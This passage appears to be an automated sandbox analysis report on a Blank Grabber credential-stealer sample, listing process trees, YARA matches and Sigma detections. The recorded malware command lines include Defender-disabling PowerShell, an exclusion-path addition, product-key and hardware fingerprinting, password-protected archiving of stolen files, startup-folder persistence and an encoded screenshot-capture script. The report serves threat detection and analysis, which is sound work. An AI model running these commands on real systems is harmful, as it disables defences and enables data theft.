WMIC.exe (PID: 7432 cmdline: wmic computersystem get totalphysicalmemory MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 7328 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 7276 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 7296 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7376 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 7636 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 7208 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 2792 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7640 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault MD5: 04029E121A0CFA5991749937DD22A1D9)

cleanup

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\_MEI17882\rarreg.key	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000002.00000002.2329026765.0000028C87B86000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000002.00000003.2322690660.0000028C87B63000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000000.00000003.2041945157.000001CCD86C8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000002.00000003.2115215405.0000028C87D18000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000002.00000003.2324666281.0000028C87B77000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000000.00000003.2041945157.000001CCD86C6000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000002.00000003.2326023533.0000028C87B85000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000002.00000003.2320597036.0000028C88DA0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000002.00000003.2323296128.0000028C87B76000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
Process Memory Space: #U202f#U202f#U2005#U00a0.scr.exe PID: 1788	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
Process Memory Space: #U202f#U202f#U2005#U00a0.scr.exe PID: 5260	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
Process Memory Space: #U202f#U202f#U2005#U00a0.scr.exe PID: 5260	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: #U202f#U202f#U2005#U00a0.scr.exe PID: 5260	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 9 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe", ParentImage: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe, ParentProcessId: 5260, ParentProcessName: #U202f#U202f#U2005#U00a0.scr.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe'", ProcessId: 4432, ProcessName: cmd.exe

Sigma detected: Powershell Defender Disable Scan Feature

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe", ParentImage: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe, ParentProcessId: 5260, ParentProcessName: #U202f#U202f#U2005#U00a0.scr.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ProcessId: 744, ProcessName: cmd.exe

Sigma detected: Rar Usage with Password and Compression Level

Source: Process started

Author: @ROxPinTeddy: Data: Command: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe a -r -hp"adrik123adi" "C:\Users\user\AppData\Local\Temp\QzNtG.zip" *", CommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe a -r -hp"adrik123adi" "C:\Users\user\AppData\Local\Temp\QzNtG.zip" *", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe", ParentImage: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe, ParentProcessId: 5260, ParentProcessName: #U202f#U202f#U2005#U00a0.scr.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe a -r -hp"adrik123adi" "C:\Users\user\AppData\Local\Temp\QzNtG.zip" *", ProcessId: 7620, ProcessName: cmd.exe

Sigma detected: Suspicious Encoded PowerShell Command Line

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM

Sigma detected: Suspicious PowerShell Encoded Command Patterns

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM

Sigma detected: Suspicious Startup Folder Persistence

Source: File created

Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe, ProcessId: 5260, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Source: Process started

Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xuxqeuoy\xuxqeuoy.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xuxqeuoy\xuxqeuoy.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcw